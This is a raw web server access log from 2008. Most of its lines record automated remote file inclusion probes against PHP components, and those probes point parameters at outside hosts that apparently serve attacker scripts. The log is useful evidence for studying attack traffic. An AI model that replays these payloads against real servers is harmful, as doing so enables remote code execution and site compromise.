89.111.184.103 - - [07/Aug/2008:09:26:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:09:26:03 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:26:04 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:26:06 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:26:07 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18417 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:26:08 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:26:08 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:26:09 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:09:26:28 -0700] "GET /bikes/dteel/WeSTOC07/ HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:26:53 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:26:54 -0700] "GET /logs/access_080315.log////common/db.php?commonpath=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:26:54 -0700] "GET ////common/db.php?commonpath=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:26:54 -0700] "GET /logs////common/db.php?commonpath=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:27:05 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:27:05 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:27:10 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:27:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:27:18 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:28:14 -0700] "GET /logs/access_080205.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [07/Aug/2008:09:28:14 -0700] "GET /logs/access_080528.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/wedangrondo/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:28:37 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:28:38 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:28:42 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:29:00 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:29:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:02 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:29:03 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:29:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:08 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.66.20 - - [07/Aug/2008:09:29:10 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:29:11 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18477 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:29:11 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:29:11 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:44 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:49 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:54 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:57 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:58 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:58 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:29:59 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:03 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:05 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:07 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:09:30:49 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:09:30:49 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:09:30:49 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:09:30:49 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:55 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:30:55 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:56 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:30:56 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:56 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:30:56 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:30:57 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18477 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:30:58 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:31:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:09:31:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:03 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:06 -0700] "GET /logs/access_080124.log//components/com_simpleboard/image_upload.php?sbp=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:08 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:09 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:12 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:13 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:31:22 -0700] "GET /logs/access_071222.log//components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:31:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:31:23 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:31:30 -0700] "GET /logs//index.php?view=page&pagename=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.52.19.154 - - [07/Aug/2008:09:31:30 -0700] "GET //index.php?view=page&pagename=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 5829 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:35 -0700] "GET /logs/access_080303.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:35 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:36 -0700] "GET /logs/access_080303.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:37 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 200 18477 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:37 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:38 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:31:38 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:31:39 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:31:42 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:31:44 -0700] "GET /classes/core/language.php?rootdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:31:44 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:31:44 -0700] "GET /logs/classes/core/language.php?rootdir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:01 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18417 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:02 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:11 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18401 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:32:11 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.60.207.171 - - [07/Aug/2008:09:32:12 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://onlinesexcity.com/wordpress/mig22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:12 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:19 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18417 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:21 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:09:32:30 -0700] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:32:32 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:32:37 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:43 -0700] "GET /logs///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 59574 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
82.49.28.184 - - [07/Aug/2008:09:32:43 -0700] "GET /logs/access_080126.log/modules/xfsection/modify.php?dir_module=http://81.169.165.90/indo/dosiris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.246.5.10 - - [07/Aug/2008:09:32:45 -0700] "GET ///?mosConfig_absolute_path=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 18417 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
62.44.72.170 - - [07/Aug/2008:09:32:47 -0700] "GET /logs/access_080326.log////common/db.php?commonpath=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:09:32:54 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:09:32:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:09:32:54 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.36.178 - - [07/Aug/2008:09:32:54 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:33:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.25 - - [07/Aug/2008:09:33:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.25 - - [07/Aug/2008:09:33:56 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 4303 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
207.162.215.10 - - [07/Aug/2008:09:34:08 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.rhemachristianschool.org/modules/banner.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:09:34:32 -0700] "GET /logs/access_080215.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
